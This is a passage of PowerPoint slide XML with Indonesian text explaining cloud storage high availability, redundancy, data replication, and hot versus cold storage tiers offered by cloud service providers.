              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tangguh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kegagalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komponen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, server, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, situs, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pusat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> area </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>luas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. CSP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lapisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>virtualisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memenuhi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriteria</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketersediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditetapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> SLA. Dalam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kinerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketersediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tinggi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (HA) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengacu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaminan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 99,99% </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>halnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, CSP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>redundansi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> disk dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kumpulan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>direplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kumpulan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>grup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> masing-masing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kumpulan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>didukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terpisah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Replikasi</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Replikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyalin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tempat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang paling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tempat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pusat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> unit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Replikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membutuhkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>latensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rendah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>koneksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>integritas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data. CSP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menawarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kinerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data (cloud.google.com/storage/docs/storage-classes). Istilah "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>panas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>" dan "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dingin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengacu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diambil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>panas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengambil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daripada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dingin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semakin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengambilan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semakin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tinggi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biayanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebutuhan</a:t>
            </a:r>
            <a:r>
